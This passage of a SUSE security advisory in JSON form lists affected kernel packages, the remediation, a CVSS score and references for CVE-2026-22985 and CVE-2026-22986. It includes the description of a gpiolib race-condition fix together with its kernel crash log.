"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22986",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22986"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpiolib: fix race condition for gdev-\u003esrcu\n\nIf two drivers were calling gpiochip_add_data_with_key(), one may be\ntraversing the srcu-protected list in gpio_name_to_desc(), meanwhile\nother has just added its gdev in gpiodev_add_to_list_unlocked().\nThis creates a non-mutexed and non-protected timeframe, when one\ninstance is dereferencing and using \u0026gdev-\u003esrcu, before the other\nhas initialized it, resulting in crash:\n\n[ 4.935481] Unable to handle kernel paging request at virtual address ffff800272bcc000\n[ 4.943396] Mem abort info:\n[ 4.943400] ESR = 0x0000000096000005\n[ 4.943403] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 4.943407] SET = 0, FnV = 0\n[ 4.943410] EA = 0, S1PTW = 0\n[ 4.943413] FSC = 0x05: level 1 translation fault\n[ 4.943416] Data abort info:\n[ 4.943418] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n[ 4.946220] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 4.955261] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 4.955268] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000038e6c000\n[ 4.961449] [ffff800272bcc000] pgd=0000000000000000\n[ 4.969203] , p4d=1000000039739003\n[ 4.979730] , pud=0000000000000000\n[ 4.980210] phandle (CPU): 0x0000005e, phandle (BE): 0x5e000000 for node \"reset\"\n[ 4.991736] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP\n...\n[ 5.121359] pc : __srcu_read_lock+0x44/0x98\n[ 5.131091] lr : gpio_name_to_desc+0x60/0x1a0\n[ 5.153671] sp : ffff8000833bb430\n[ 5.298440]\n[ 5.298443] Call trace:\n[ 5.298445] __srcu_read_lock+0x44/0x98\n[ 5.309484] gpio_name_to_desc+0x60/0x1a0\n[ 5.320692] gpiochip_add_data_with_key+0x488/0xf00\n 5.946419] ---[ end trace 0000000000000000 ]---\n\nMove initialization code for gdev fields before it is added to\ngpio_devices, with adjacent initialization code.\nAdjust goto statements to reflect modified order of operations\n\n[Bartosz: fixed a build issue, removed stray newline]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
